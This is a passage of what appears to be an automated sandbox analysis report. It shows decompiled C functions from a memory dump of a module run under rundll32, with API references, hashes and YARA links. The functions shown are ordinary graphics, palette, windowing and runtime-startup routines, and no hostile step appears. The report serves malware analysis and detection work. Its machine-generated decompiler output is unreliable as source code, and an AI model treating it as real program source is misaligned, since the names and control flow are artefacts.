					} else {
						goto L14;
					}
				}
			}



















                          0x027f36b5
                          0x027f36b7
                          0x027f36bb
                          0x027f36bc
                          0x027f36bd
                          0x027f36bf
                          0x027f36c4
                          0x027f36cc
                          0x027f36d3
                          0x027f36d6
                          0x027f36e0
                          0x027f36ed
                          0x027f36f2
                          0x027f36f2
                          0x027f36f9
                          0x027f3704
                          0x027f36fb
                          0x027f36fd
                          0x027f36fd
                          0x027f370b
                          0x027f370e
                          0x027f3713
                          0x027f371a
                          0x027f371b
                          0x027f3720
                          0x027f3723
                          0x027f3734
                          0x027f3739
                          0x027f373a
                          0x027f373f
                          0x027f3742
                          0x027f3749
                          0x027f3754
                          0x027f3758
                          0x027f3758
                          0x027f3758
                          0x027f375a
                          0x027f3761
                          0x027f380d
                          0x027f380f
                          0x027f3812
                          0x027f3815
                          0x027f3822
                          0x027f3767
                          0x027f3807
                          0x027f3776
                          0x027f377e
                          0x027f3788
                          0x027f3798
                          0x027f37a6
                          0x027f37b1
                          0x027f37b6
                          0x027f37b9
                          0x027f37d7
                          0x027f37da
                          0x027f37dd
                          0x027f37e2
                          0x027f37e7
                          0x027f37ec
                          0x00000000
                          0x00000000
                          0x00000000
                          0x027f3807

                          APIs
                          • GetCurrentThreadId.KERNEL32 ref: 027F36BF
                          • GetCurrentThreadId.KERNEL32 ref: 027F36CE
                            • Part of subcall function 027F368C: ResetEvent.KERNEL32(000002B0,027F3709), ref: 027F3692
                          • RtlEnterCriticalSection.KERNEL32(02865870), ref: 027F3713
                          • InterlockedExchange.KERNEL32(028635B8,?), ref: 027F372F
                          • RtlLeaveCriticalSection.KERNEL32(02865870,00000000,027F3823,?,00000000,027F3842,?,02865870), ref: 027F3788
                          • RtlEnterCriticalSection.KERNEL32(02865870,027F37F4,027F3823,?,00000000,027F3842,?,02865870), ref: 027F37E7
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalSection$CurrentEnterThread$EventExchangeInterlockedLeaveReset
                          • String ID:
                          • API String ID: 2189153385-0
                          • Opcode ID: 2806618d3b2dd6c12eab61141e8dc7d90f17fa8830e6908a35eb2327750ee560
                          • Instruction ID: 33cccc330184a2a33a8bae1fb7c0a6a6d4a09fe98129cc37cbf169891501e591
                          • Opcode Fuzzy Hash: 2806618d3b2dd6c12eab61141e8dc7d90f17fa8830e6908a35eb2327750ee560
                          • Instruction Fuzzy Hash: 2231D3B4A08385AFE752DFA4D899A6EBBF9EB09B00F4184E4E601D6750D7399800CE31
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 02857610 Relevance: 9.1, APIs: 6, Instructions: 93windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E02857610(void* __eax, void* __ecx, void* __edi, void* __eflags) {
				void* _t26;
				void* _t31;
				int _t37;
				int _t40;
				void* _t44;
				void* _t49;
				int _t56;
				void* _t60;
				void* _t65;

				_t60 = __eax;
				E027F7DC0( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x160)) + 0x14)), __ecx, 0, __edi, _t65, __eflags);
				E027F79C4( *((intOrPtr*)( *((intOrPtr*)(_t60 + 0x160)) + 0x10)), __ecx,  *((intOrPtr*)(E02855D3C(E028578B8(_t60), __eflags) + 0x70)), __edi, _t65);
				_t26 =  *((intOrPtr*)(E028578B8(_t60) + 0x227)) - 2;
				if(_t26 >= 0) {
					_t44 = _t26 - 2;
					if(_t44 < 0) {
						PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 2, 6, 0x5a0049);
						_t49 = E0282D154(_t60);
						PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, _t49 - 6, 2, 0x5a0049);
						_t56 = E0282D154(_t60) - 4;
						__eflags = _t56;
						return PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), _t56, 0, 2, 6, 0x5a0049);
					}
					return _t44;
				}
				PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 0, 0, 6, 2, 0x5a0049);
				_t31 = E0282D198(_t60);
				PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 2, 2, 2, _t31 - 4, 0x5a0049);
				_t37 = E0282D198(_t60);
				_t40 = E0282D198(_t60) - 2;
				__eflags = _t40;
				return PatBlt(E027F84EC( *((intOrPtr*)(_t60 + 0x160))), 0, _t40, 6, _t37, 0x5a0049);
			}












                          0x02857611
                          0x0285761e
                          0x0285763b
                          0x0285764d
                          0x0285764f
                          0x02857651
                          0x02857653
                          0x028576e7
                          0x028576f5
                          0x0285770e
                          0x02857725
                          0x02857725
                          0x00000000
                          0x02857735
                          0x00000000
                          0x02857653
                          0x02857673
                          0x0285767f
                          0x0285769a
                          0x028576a6
                          0x028576b5
                          0x028576b5
                          0x028576cd

                          APIs
                          • PatBlt.GDI32(00000000,00000000,00000000,00000006,00000002,005A0049), ref: 02857673
                          • PatBlt.GDI32(00000000,00000002,00000002,00000002,-00000004,005A0049), ref: 0285769A
                          • PatBlt.GDI32(00000000,00000000,-00000002,00000006,00000000,005A0049), ref: 028576C7
                          • PatBlt.GDI32(00000000,00000000,00000000,00000002,00000006,005A0049), ref: 028576E7
                          • PatBlt.GDI32(00000000,00000002,00000002,-00000006,00000002,005A0049), ref: 0285770E
                          • PatBlt.GDI32(00000000,-00000004,00000000,00000002,00000006,005A0049), ref: 02857735
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ca578b8701be7ae8a406fe4c9541cdd9eca0d2c7df7a84c53836d1538809b1e
                          • Instruction ID: d6de68f6709b1634109321d0a2df47e4f68bfec8036f7d8c6dd340b4759ff7aa
                          • Opcode Fuzzy Hash: 3ca578b8701be7ae8a406fe4c9541cdd9eca0d2c7df7a84c53836d1538809b1e
                          • Instruction Fuzzy Hash: 8F2110683903107BE661BF788C8FF6B6A5A7B04704F449471BB09EF2D7C9AAD8044E65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F9324 Relevance: 9.1, APIs: 6, Instructions: 84COMMON
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E027F9324(intOrPtr* __eax, void* __ebx, signed int __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, signed int* _a4, signed int* _a8) {
				intOrPtr* _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v32;
				struct HDC__* _v44;
				signed int* _t36;
				signed int _t39;
				signed int _t42;
				signed int* _t52;
				signed int _t56;
				intOrPtr _t66;
				void* _t72;
				void* _t73;
				void* _t74;
				intOrPtr _t75;

				_t73 = _t74;
				_t75 = _t74 + 0xffffff90;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t52 = _a8;
				_v24 = _v16 << 4;
				_v20 = E027D8138(_v24, __eflags);
				 *[fs:edx] = _t75;
				_t56 = _v24;
				 *((intOrPtr*)( *_v8 + 0xc))( *[fs:edx], 0x27f961b, _t73, __edi, __esi, __ebx, _t72);
				if(( *_t52 | _t52[1]) != 0) {
					_t36 = _a4;
					 *_t36 =  *_t52;
					_t36[1] = _t52[1];
				} else {
					 *_a4 = GetSystemMetrics(0xb);
					_a4[1] = GetSystemMetrics(0xc);
				}
				_v44 = GetDC(0);
				if(_v44 == 0) {
					E027F87E8(_t56);
				}
				_push(_t73);
				_push(0x27f940d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t75;
				_t39 = GetDeviceCaps(_v44, 0xe);
				_t42 = _t39 * GetDeviceCaps(_v44, 0xc);
				if(_t42 <= 8) {
					__eflags = 1;
					_v32 = 1 << _t42;
				} else {
					_v32 = 0x7fffffff;
				}
				_pop(_t66);
				 *[fs:eax] = _t66;
				_push(0x27f9414);
				return ReleaseDC(0, _v44);
			}




















                          0x027f9325
                          0x027f9327
                          0x027f932d
                          0x027f9330
                          0x027f9333
                          0x027f9336
                          0x027f933f
                          0x027f934a
                          0x027f9358
                          0x027f935e
                          0x027f9366
                          0x027f936e
                          0x027f938b
                          0x027f9390
                          0x027f9395
                          0x027f9370
                          0x027f937a
                          0x027f9386
                          0x027f9386
                          0x027f939f
                          0x027f93a6
                          0x027f93a8
                          0x027f93a8
                          0x027f93af
                          0x027f93b0
                          0x027f93b5
                          0x027f93b8
                          0x027f93c1
                          0x027f93d7
                          0x027f93dd
                          0x027f93ef
                          0x027f93f1
                          0x027f93df
                          0x027f93df
                          0x027f93df
                          0x027f93f6
                          0x027f93f9
                          0x027f93fc
                          0x027f940c

                          APIs
                          • GetSystemMetrics.USER32(0000000B), ref: 027F9372
                          • GetSystemMetrics.USER32(0000000C), ref: 027F937E
                          • GetDC.USER32(00000000), ref: 027F939A
                          • GetDeviceCaps.GDI32(00000000,0000000E), ref: 027F93C1
                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 027F93CE
                          • ReleaseDC.USER32(00000000,00000000), ref: 027F9407
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDeviceMetricsSystem$Release
                          • String ID:
                          • API String ID: 447804332-0
                          • Opcode ID: 8e57a93e1ff8bdfe5fb1151673c30ddee03ba1cd5e4c410adafd0c08f4cfa952
                          • Instruction ID: a42800a466d628ab70a6caeb74ac35ed0ea79c978c6c51a7fb057a7db56201cf
                          • Opcode Fuzzy Hash: 8e57a93e1ff8bdfe5fb1151673c30ddee03ba1cd5e4c410adafd0c08f4cfa952
                          • Instruction Fuzzy Hash: 08316174A04204EFEB41DFA5C885BAEBBB6FF89710F108565EA14AB384C731A941CF65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F9794 Relevance: 9.1, APIs: 6, Instructions: 65windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 67%
                          			E027F9794(struct HBITMAP__* __eax, void* __ebx, struct tagBITMAPINFO* __ecx, struct HPALETTE__* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v5;
				struct HPALETTE__* _v12;
				struct HDC__* _v16;
				struct tagBITMAPINFO* _t36;
				intOrPtr _t43;
				struct HBITMAP__* _t47;
				void* _t50;

				_t36 = __ecx;
				_t47 = __eax;
				E027F9644(__eax, _a4, __ecx);
				_v12 = 0;
				_v16 = CreateCompatibleDC(0);
				_push(_t50);
				_push(0x27f9831);
				_push( *[fs:eax]);
				 *[fs:eax] = _t50 + 0xfffffff4;
				if(__edx != 0) {
					_v12 = SelectPalette(_v16, __edx, 0);
					RealizePalette(_v16);
				}
				_v5 = GetDIBits(_v16, _t47, 0, _t36->bmiHeader.biHeight, _a8, _t36, 0) != 0;
				_pop(_t43);
				 *[fs:eax] = _t43;
				_push(0x27f9838);
				if(_v12 != 0) {
					SelectPalette(_v16, _v12, 0);
				}
				return DeleteDC(_v16);
			}










                          0x027f979d
                          0x027f97a1
                          0x027f97aa
                          0x027f97b1
                          0x027f97bb
                          0x027f97c0
                          0x027f97c1
                          0x027f97c6
                          0x027f97c9
                          0x027f97ce
                          0x027f97dc
                          0x027f97e3
                          0x027f97e3
                          0x027f9801
                          0x027f9807
                          0x027f980a
                          0x027f980d
                          0x027f9816
                          0x027f9822
                          0x027f9822
                          0x027f9830

                          APIs
                            • Part of subcall function 027F9644: GetObjectA.GDI32(?,00000054), ref: 027F9658
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F97B6
                          • SelectPalette.GDI32(?,?,00000000), ref: 027F97D7
                          • RealizePalette.GDI32(?), ref: 027F97E3
                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 027F97FA
                          • SelectPalette.GDI32(?,00000000,00000000), ref: 027F9822
                          • DeleteDC.GDI32(?), ref: 027F982B
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Palette$Select$BitsCompatibleCreateDeleteObjectRealize
                          • String ID:
                          • API String ID: 1221726059-0
                          • Opcode ID: 5e717d557351002e7b6d3f00df1653cf563c4008a95968afa0233354a2e78120
                          • Instruction ID: f3510c0d0ab29a351b1ae5cfdb5c5ee5ca4769214b7791424e2da7520e9ce77d
                          • Opcode Fuzzy Hash: 5e717d557351002e7b6d3f00df1653cf563c4008a95968afa0233354a2e78120
                          • Instruction Fuzzy Hash: 24115E75A04208BFEB55DBA9DC85F9EBBFDEF48B10F518464B618E7280D6749900CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D1B80 Relevance: 9.1, APIs: 6, Instructions: 62COMMON
                          Download Yara Rule
                          C-Code - Quality: 72%
                          			E027D1B80() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x28655c4 == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E027D1C56);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x286504d != 0) {
						_push(0x28655cc);
						L027D1418();
					}
					 *0x28655c4 = 0;
					_t3 =  *0x2865624; // 0x2916550
					LocalFree(_t3);
					 *0x2865624 = 0;
					_t19 =  *0x28655ec; // 0x2917b84
					while(_t19 != 0x28655ec) {
						_t1 = _t19 + 8; // 0x41d0000
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E027D1480(0x28655ec);
					E027D1480(0x28655fc);
					E027D1480(0x2865628);
					_t14 =  *0x28655e4; // 0x2917550
					while(_t14 != 0) {
						 *0x28655e4 =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x28655e4; // 0x2917550
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x27d1c5d);
					if( *0x286504d != 0) {
						_push(0x28655cc);
						L027D1420();
					}
					_push(0x28655cc);
					L027D1428();
					return 0;
				}
			}










                          0x027d1b81
                          0x027d1b8b
                          0x027d1c5f
                          0x027d1b91
                          0x027d1b93
                          0x027d1b94
                          0x027d1b99
                          0x027d1b9c
                          0x027d1ba6
                          0x027d1ba8
                          0x027d1bad
                          0x027d1bad
                          0x027d1bb2
                          0x027d1bb9
                          0x027d1bbf
                          0x027d1bc6
                          0x027d1bcb
                          0x027d1be5
                          0x027d1bda
                          0x027d1bde
                          0x027d1be3
                          0x027d1be3
                          0x027d1bf2
                          0x027d1bfc
                          0x027d1c06
                          0x027d1c0b
                          0x027d1c12
                          0x027d1c16
                          0x027d1c1d
                          0x027d1c22
                          0x027d1c27
                          0x027d1c2d
                          0x027d1c30
                          0x027d1c33
                          0x027d1c3f
                          0x027d1c41
                          0x027d1c46
                          0x027d1c46
                          0x027d1c4b
                          0x027d1c50
                          0x027d1c55
                          0x027d1c55

                          APIs
                          • RtlEnterCriticalSection.KERNEL32(028655CC,00000000,027D1C56), ref: 027D1BAD
                          • LocalFree.KERNEL32(02916550,00000000,027D1C56), ref: 027D1BBF
                          • VirtualFree.KERNEL32(041D0000,00000000,00008000,02916550,00000000,027D1C56), ref: 027D1BDE
                          • LocalFree.KERNEL32(02917550,041D0000,00000000,00008000,02916550,00000000,027D1C56), ref: 027D1C1D
                          • RtlLeaveCriticalSection.KERNEL32(028655CC,027D1C5D,02916550,00000000,027D1C56), ref: 027D1C46
                          • RtlDeleteCriticalSection.KERNEL32(028655CC,027D1C5D,02916550,00000000,027D1C56), ref: 027D1C50
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                          • String ID:
                          • API String ID: 3782394904-0
                          • Opcode ID: 0d26644e812c85404f1bae3c05c1f31f6141cb21779964a5788941bebdd90198
                          • Instruction ID: 861aaeb2f0e48b452781e3548e1fc62523097e23e49abfec4a057ba62500f953
                          • Opcode Fuzzy Hash: 0d26644e812c85404f1bae3c05c1f31f6141cb21779964a5788941bebdd90198
                          • Instruction Fuzzy Hash: 3C1191BCB853409FF716AB68A95DB2A3BBAE745744FC04894E10C8B6C1D7ACA450CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0282A4C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E0282A4C4(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* _t20;
				void* _t21;
				void* _t27;
				void* _t31;
				void* _t35;
				intOrPtr* _t43;

				_t43 =  &_v8;
				_t20 =  *0x2863ebc; // 0x0
				 *((intOrPtr*)(_t20 + 0x180)) = _a4;
				_t21 =  *0x2863ebc; // 0x0
				SetWindowLongA(_a4, 0xfffffffc,  *(_t21 + 0x18c));
				if((GetWindowLongA(_a4, 0xfffffff0) & 0x40000000) != 0 && GetWindowLongA(_a4, 0xfffffff4) == 0) {
					SetWindowLongA(_a4, 0xfffffff4, _a4);
				}
				_t27 =  *0x2863ebc; // 0x0
				SetPropA(_a4,  *0x2865ba2 & 0x0000ffff, _t27);
				_t31 =  *0x2863ebc; // 0x0
				SetPropA(_a4,  *0x2865ba0 & 0x0000ffff, _t31);
				_t35 =  *0x2863ebc; // 0x0
				 *0x2863ebc = 0;
				_v8 =  *((intOrPtr*)(_t35 + 0x18c))(_a4, _a8, _a12, _a16);
				return  *_t43;
			}










                          0x0282a4c9
                          0x0282a4cc
                          0x0282a4d4
                          0x0282a4da
                          0x0282a4ec
                          0x0282a501
                          0x0282a51c
                          0x0282a51c
                          0x0282a521
                          0x0282a533
                          0x0282a538
                          0x0282a54a
                          0x0282a55b
                          0x0282a560
                          0x0282a570
                          0x0282a578

                          APIs
                          • SetWindowLongA.USER32(?,000000FC,?), ref: 0282A4EC
                          • GetWindowLongA.USER32(?,000000F0), ref: 0282A4F7
                          • GetWindowLongA.USER32(?,000000F4), ref: 0282A509
                          • SetWindowLongA.USER32(?,000000F4,?), ref: 0282A51C
                          • SetPropA.USER32(?,00000000,00000000), ref: 0282A533
                          • SetPropA.USER32(?,00000000,00000000), ref: 0282A54A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: LongWindow$Prop
                          • String ID:
                          • API String ID: 3887896539-0
                          • Opcode ID: 2c4e8f4be5966f36105d6e24346da15550e5284eddb21fa06b1028077ca27df9
                          • Instruction ID: 73670e56547a39aff962948f8bc53bb01143af6203e8367a2a9ebba69dcafe50
                          • Opcode Fuzzy Hash: 2c4e8f4be5966f36105d6e24346da15550e5284eddb21fa06b1028077ca27df9
                          • Instruction Fuzzy Hash: EB11F9B9A04108BFCF01DFD8E988E9A37AEFB08350F108645F918CB290D774E954CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F8FD4 Relevance: 9.1, APIs: 6, Instructions: 55windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027F8FD4(void* __eax, signed int __ecx) {
				char _v1036;
				signed int _v1038;
				struct tagRGBQUAD _v1048;
				short _v1066;
				void* _t20;
				struct HDC__* _t25;
				void* _t28;
				void* _t31;
				struct HPALETTE__* _t33;
				LOGPALETTE* _t34;

				_t31 = __eax;
				_t33 = 0;
				_t34->palVersion = 0x300;
				if(__eax == 0) {
					_v1038 = __ecx;
					E027D2978(_t28, __ecx << 2,  &_v1036);
				} else {
					_t25 = CreateCompatibleDC(0);
					_t20 = SelectObject(_t25, _t31);
					_v1066 = GetDIBColorTable(_t25, 0, 0x100,  &_v1048);
					SelectObject(_t25, _t20);
					DeleteDC(_t25);
				}
				if(_v1038 != 0) {
					if(_v1038 != 0x10 || E027F8F3C(_t34) == 0) {
						E027F8DCC( &_v1036, _v1038 & 0x0000ffff);
					}
					_t33 = CreatePalette(_t34);
				}
				return _t33;
			}













                          0x027f8fdd
                          0x027f8fdf
                          0x027f8fe1
                          0x027f8fe9
                          0x027f9023
                          0x027f9031
                          0x027f8feb
                          0x027f8ff2
                          0x027f8ff6
                          0x027f900f
                          0x027f9016
                          0x027f901c
                          0x027f901c
                          0x027f903c
                          0x027f9044
                          0x027f905a
                          0x027f905a
                          0x027f9067
                          0x027f9067
                          0x027f9074

                          APIs
                          • CreateCompatibleDC.GDI32(00000000), ref: 027F8FED
                          • SelectObject.GDI32(00000000,00000000), ref: 027F8FF6
                          • GetDIBColorTable.GDI32(00000000,00000000,00000100,?,00000000,00000000,00000000,00000000,?,?,027FCC8B,?,?,?,?,027FB78B), ref: 027F900A
                          • SelectObject.GDI32(00000000,00000000), ref: 027F9016
                          • DeleteDC.GDI32(00000000), ref: 027F901C
                          • CreatePalette.GDI32 ref: 027F9062
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CreateObjectSelect$ColorCompatibleDeletePaletteTable
                          • String ID:
                          • API String ID: 2515223848-0
                          • Opcode ID: 28f14418b4d4236feb8a30c2cef6a9edbf3e3df895f3b389eb017c49fc133ce8
                          • Instruction ID: dc90d9602cb6afe316ac9df21e1c8fedbbd7807ed2aa32d5f87c3302f8313f29
                          • Opcode Fuzzy Hash: 28f14418b4d4236feb8a30c2cef6a9edbf3e3df895f3b389eb017c49fc133ce8
                          • Instruction Fuzzy Hash: 5801F161208311B2E261B739AC0AF6B72FE8FC0750F01C81DB78887381EB79C8448762
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027F86B8 Relevance: 9.0, APIs: 6, Instructions: 43COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027F86B8(void* __eax) {
				void* _t36;

				_t36 = __eax;
				UnrealizeObject(E027F7CD8( *((intOrPtr*)(__eax + 0x14))));
				SelectObject( *(_t36 + 4), E027F7CD8( *((intOrPtr*)(_t36 + 0x14))));
				if(E027F7DB8( *((intOrPtr*)(_t36 + 0x14))) != 0) {
					SetBkColor( *(_t36 + 4),  !(E027F7018(E027F7C9C( *((intOrPtr*)(_t36 + 0x14))))));
					return SetBkMode( *(_t36 + 4), 1);
				} else {
					SetBkColor( *(_t36 + 4), E027F7018(E027F7C9C( *((intOrPtr*)(_t36 + 0x14)))));
					return SetBkMode( *(_t36 + 4), 2);
				}
			}




                          0x027f86b9
                          0x027f86c4
                          0x027f86d6
                          0x027f86e5
                          0x027f871f
                          0x027f8730
                          0x027f86e7
                          0x027f86f9
                          0x027f870a
                          0x027f870a

                          APIs
                            • Part of subcall function 027F7CD8: CreateBrushIndirect.GDI32(?), ref: 027F7D82
                          • UnrealizeObject.GDI32(00000000), ref: 027F86C4
                          • SelectObject.GDI32(?,00000000), ref: 027F86D6
                          • SetBkColor.GDI32(?,00000000), ref: 027F86F9
                          • SetBkMode.GDI32(?,00000002), ref: 027F8704
                          • SetBkColor.GDI32(?,00000000), ref: 027F871F
                          • SetBkMode.GDI32(?,00000001), ref: 027F872A
                            • Part of subcall function 027F7018: GetSysColor.USER32(?), ref: 027F7022
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmpDownload File
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Color$ModeObject$BrushCreateIndirectSelectUnrealize
                          • String ID:
                          • API String ID: 3527656728-0
                          • Opcode ID: 6cd9974d2dea045e97866566062b6760bb0b00fb878ad759991c05fae6e6750c
                          • Instruction ID: ad61d16dbe5fb09cdb4c831c11b34cebdc83d4b177b8bb9c68f892388adc69f6
                          • Opcode Fuzzy Hash: 6cd9974d2dea045e97866566062b6760bb0b00fb878ad759991c05fae6e6750c
                          • Instruction Fuzzy Hash: 76F07D65605100ABDF99FFB8EEC9D1B6BAE5F04311B444454BA04DF246DA65D8108F31
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 027D6139 Relevance: 9.0, APIs: 6, Instructions: 41threadCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E027D6139(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
				long _t11;
				void* _t16;

				_t16 = __ebx;
				 *__edi =  *__edi + __ecx;
				 *((intOrPtr*)(__eax - 0x28655bc)) =  *((intOrPtr*)(__eax - 0x28655bc)) + __eax - 0x28655bc;
				 *0x2863008 = 2;
				 *0x2865014 = 0x27d12bc;
				 *0x2865018 = 0x27d12c4;
				 *0x286504e = 2;
				 *0x2865000 = E027D4F54;
				if(E027D304C() != 0) {
					_t3 = E027D307C();
				}
				E027D3140(_t3);
				 *0x2865054 = 0xd7b0;
				 *0x2865220 = 0xd7b0;
				 *0x28653ec = 0xd7b0;
				 *0x2865040 = GetCommandLineA();
				 *0x286503c = E027D13CC();
				if((GetVersion() & 0x80000000) == 0x80000000) {
					 *0x28655c0 = E027D6070(GetThreadLocale(), _t16, __eflags);
				} else {
					if((GetVersion() & 0x000000ff) <= 4) {
						 *0x28655c0 = E027D6070(GetThreadLocale(), _t16, __eflags);
					} else {
						 *0x28655c0 = 3;
					}
				}
				_t11 = GetCurrentThreadId();
				 *0x2865034 = _t11;
				return _t11;
			}





                          0x027d6139
                          0x027d613e
                          0x027d6143
                          0x027d6145
                          0x027d614c
                          0x027d6156
                          0x027d6160
                          0x027d6167
                          0x027d6178
                          0x027d617a
                          0x027d617a
                          0x027d617f
                          0x027d6184
                          0x027d618d
                          0x027d6196
                          0x027d61a4
                          0x027d61ae
                          0x027d61c2
                          0x027d61fb
                          0x027d61c4
                          0x027d61d2
                          0x027d61ea
                          0x027d61d4
                          0x027d61d4
                          0x027d61d4
                          0x027d61d2
                          0x027d6200
                          0x027d6205
                          0x027d620a

                          APIs
                            • Part of subcall function 027D304C: GetKeyboardType.USER32(00000000), ref: 027D3051
                            • Part of subcall function 027D304C: GetKeyboardType.USER32(00000001), ref: 027D305D
                          • GetCommandLineA.KERNEL32 ref: 027D619F
                          • GetVersion.KERNEL32 ref: 027D61B3
                          • GetVersion.KERNEL32 ref: 027D61C4
